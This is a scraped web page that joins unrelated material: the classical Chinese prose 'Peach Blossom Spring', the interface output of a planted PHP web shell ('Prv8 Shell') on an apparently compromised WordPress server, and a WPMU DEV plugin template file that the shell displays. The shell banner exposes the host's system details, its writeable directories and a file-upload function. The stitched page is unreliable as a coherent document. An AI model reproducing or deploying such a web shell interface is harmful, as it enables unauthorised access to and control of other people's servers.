晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/stando/www/wp-content/plugins/wpmudev-updates/template/sui/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/stando/www/wp-content/plugins/wpmudev-updates/template/sui/login-team-selection.php
<?php
/**
 * Hub team selection template.
 *
 * @since   4.11.10
 * @package WPMUDEV
 */

// Team authentication.
$form_action = WPMUDEV_Dashboard::$api->rest_url( 'site-authenticate-team' );
// Redirect URL.
$redirect_url = WPMUDEV_Dashboard::$ui->page_urls->dashboard_url;
// Authenticating domain.
$domain = WPMUDEV_Dashboard::$api->network_site_url();

// nonce verifier.
$auth_verify_nonce = wp_verify_nonce( ( isset( $_REQUEST['auth_nonce'] ) ? $_REQUEST['auth_nonce'] : '' ), 'auth_nonce' );
// API key.
$api_key = empty( $_GET['key'] ) ? '' : trim( $_GET['key'] );

// Default error message.
$error = __( 'Unknown API error occurred. Please try again.', 'wpmudev' );

if ( $auth_verify_nonce && ! empty( $api_key ) ) {
	$teams = WPMUDEV_Dashboard::$api->get_user_teams( $api_key );
	// API error.
	if ( false === $teams ) {
		$error = WPMUDEV_Dashboard::$api->api_error;
	}
} else {
	// If nonce invalid or key not found redirect to login again.
	WPMUDEV_Dashboard::$ui->redirect_to( WPMUDEV_Dashboard::$ui->page_urls->dashboard_url );
}

$logo   = WPMUDEV_Dashboard::$site->plugin_url . 'assets/images/onboarding/team-selection/logo.png';
$logo2x = WPMUDEV_Dashboard::$site->plugin_url . 'assets/images/onboarding/team-selection/logo@2x.png';
$logo3x = WPMUDEV_Dashboard::$site->plugin_url . 'assets/images/onboarding/team-selection/logo@3x.png';

?>

<div class="dashui-onboarding">
	<div class="dashui-onboarding-body dashui-onboarding-content-center">
		<div class="dashui-team-select-form">
			<img
				src="<?php echo esc_url( $logo ); ?>"
				srcset="<?php echo esc_url( $logo ); ?> 1x, <?php echo esc_url( $logo2x ); ?> 2x, <?php echo esc_url( $logo3x ); ?> 3x"
				class="dashui-onboarding-logo"
				alt="<?php esc_html_e( 'Select Team', 'wpmudev' ); ?>"
			/>

			<div class="dashui-team-select-header">
				<h2><?php esc_html_e( 'Choose The Hub Team', 'wpmudev' ); ?></h2>

				<span class="sui-description">
					<?php esc_html_e( 'We’ve noticed that you are a member of multiple teams in The Hub. Which team would you like to connect to this site?', 'wpmudev' ); ?>
				</span>
			</div>

			<?php if ( empty( $teams ) ) : ?>
				<div
					role="alert"
					class="sui-notice sui-notice-red sui-active"
					aria-live="assertive"
					style="display: block;"
				>
					<div class="sui-notice-content">
						<div class="sui-notice-message">
							<span class="sui-notice-icon sui-icon-info sui-md" aria-hidden="true"></span>
							<p><?php echo esc_html( $error ); ?></p>
						</div>
					</div>
				</div>
			<?php else : ?>
				<form method="post" action="<?php echo esc_url( $form_action ); ?>">
					<input type="hidden" name="api_key" value="<?php echo esc_html( $api_key ); ?>">
					<input type="hidden" name="redirect_url" value="<?php echo esc_url( $redirect_url ); ?>">
					<input type="hidden" name="domain" value="<?php echo esc_url( $domain ); ?>">
					<input type="hidden" name="auth_nonce" value="<?php echo esc_attr( wp_create_nonce('auth_nonce') ); ?>">

					<div class="sui-box-selectors sui-box-selectors-col-1">
						<ul>
							<?php foreach ( $teams as $team ) : ?>
								<li>
									<label
										for="team-id-<?php echo intval( $team['id'] ); ?>"
										class="sui-box-selector"
									>
										<input
											type="radio"
											name="team_id"
											value="<?php echo intval( $team['id'] ); ?>"
											id="team-id-<?php echo intval( $team['id'] ); ?>"
										/>
										<span>
											<?php if ( ! empty( $team['avatar_url'] ) ) : ?>
												<span
													class="team-avatar"
													aria-hidden="true"
													style="background-image: url('<?php echo esc_url( $team['avatar_url'] ); ?>')"
												></span>
											<?php else : ?>
												<span class="sui-icon-community-people" aria-hidden="true"></span>
											<?php endif; ?>
											<?php echo esc_html( $team['nice_name'] ); ?>
										</span>
									</label>
								</li>
							<?php endforeach; ?>
						</ul>
						<div class="box-footer-submit">
							<button
								type="submit"
								disabled="disabled"
								id="dashui-team-select-submit"
								class="sui-button sui-button-blue sui-button-icon-right"
							>
								<span class="sui-loading-text">
									<?php esc_html_e( 'Continue', 'wpmudev' ); ?>
								<span class="sui-icon-arrow-right" aria-hidden="true"></span>
								</span>
								<span class="sui-icon-loader sui-loading" aria-hidden="true"></span>
							</button>
						</div>
					</div>
				</form>
			<?php endif; ?>
		</div>
	</div>
</div>

haha - 2025